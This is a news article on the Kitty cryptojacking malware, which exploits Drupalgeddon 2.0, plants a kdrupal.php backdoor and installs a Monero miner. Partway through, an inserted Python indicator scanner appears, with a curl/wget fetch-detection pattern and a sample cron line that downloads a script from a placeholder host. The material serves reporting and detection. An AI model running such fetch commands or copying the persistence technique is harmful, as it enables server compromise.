Cat got your tongue? It also might be stealing your computer processing power, in order to mine Monero coins.
According to researchers at Imperva, a newly uncovered, sophisticated cryptojacking malware nicknamed Kitty is attempting to infect web application servers by exploiting the recently discovered Drupalgeddon 2.0 remote code execution vulnerability that was patched last March. But what makes this malicious miner stand out among its brethren is that after compromising the server, it seeks to infect future users of the apps running on the server.
In a May 2 company blog post, Imperva researchers Nadav Avital, Matan Lion and Ron Masas explain that following a successful exploitation, Kitty’s first step is to use a webminerpool — an open-source mining software for browsers — to execute a bash script that writes a malicious PHP backdoor file named “kdrupal.php” to the infected server’s disk. This helps establish persistence by installing a backdoor that does not rely on the Drupal exploit in order to remain effective.
Moreover, the malicious script is repeatedly downloaded from a remote host every minute, so that the compromised server can be re-infected or updated at any time.
Once persistence is established, the malware installs the final payload in the form of the miner program “kkworker,” better known as the XMRig Monero miner. It’s at this point where Kitty starts to behave especially, well, catty.
As an adorable extra flourish, the malware’s author has also included a message in the script code that reads: “me0w, don’t delete pls i am a harmless cute little kitty me0w.”
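A defender's sweep for the artifacts named above, as an added example that is not from Imperva's report or the original article: it checks a web root for the file names kdrupal.php and kkworker and for the me0w marker string, and flags scheduled jobs that fetch a remote URL every minute. It assumes the repeated download is scheduled through cron, which the article does not state; the sample files and URL are constructed.

```python
import os
import re
import tempfile

# Indicators named in the article: backdoor file, miner binary, script marker.
NAMES = {"kdrupal.php", "kkworker"}
MARKER = b"me0w"
# Assumption: the every-minute re-download is scheduled through cron.
FETCH = re.compile(r"\b(curl|wget)\b.*https?://", re.I)

def scan_webroot(root):
    """Return sorted (relative path, reason) pairs for matching files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name in NAMES:
                hits.append((rel, "filename"))
                continue
            try:
                with open(path, "rb") as fh:
                    if MARKER in fh.read(1 << 20):  # first 1 MiB only
                        hits.append((rel, "marker"))
            except OSError:
                pass  # unreadable file: skip it, keep sweeping
    return sorted(hits)

def scan_crontab(text):
    """Return cron entries that run every minute and fetch a remote URL."""
    hits = []
    for line in map(str.strip, text.splitlines()):
        fields = line.split(None, 5)
        if line.startswith("#") or len(fields) < 6:
            continue
        every_minute = fields[0] in ("*", "*/1") and fields[1:5] == ["*"] * 4
        if every_minute and FETCH.search(fields[5]):
            hits.append(line)
    return hits

if __name__ == "__main__":
    # Constructed sample data, not taken from a real infection.
    root = tempfile.mkdtemp()
    for rel, body in {"index.php": "<?php", "kdrupal.php": "<?php", "x.sh": "# me0w\n"}.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    print(scan_webroot(root))
    print(scan_crontab("* * * * * curl -s http://example.invalid/k.sh -o /tmp/k\n"))
```

A renamed backdoor or miner will not match the file-name check, so treat a clean result as inconclusive and review any every-minute fetch job on its own merits.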
Imperva further reports that the Monero address used by Kitty was spotted in early April 2018, and is linked to attacks targeting web servers running the vBulletin 4.2.X content management system (CMS).
The Drupalgeddon 2.0 vulnerability (CVE-2018-7600) that makes Kitty’s initial infection possible is an RCE flaw that exists within multiple subsystems of unpatched versions of Drupal 6.x (obsolete), 7.x and 8.x.
“…It’s important to note that vulnerabilities that affect CMS frameworks — like Drupalgeddon 2.0 — are particularly concerning because the systems make up a significant portion of the internet and are prime candidates for botnet herding,” said Rod Soto, director of security research at SOC services provider JASK, in emailed comments. “Botnets, as history has shown us, are a fundamental tactic used by bad actors for criminal activity and a main profit driver for the cybercrime underground – as they can be used for cryptomining, spam, identity theft, phishing, financial fraud, DDoS and more. So, even though the Kitty malware is simply lining bad actors’ pockets with cryptocoins at the moment, we should expect to see new variants of malware that exploit Drupalgeddon 2.0 to execute further attacks as well.”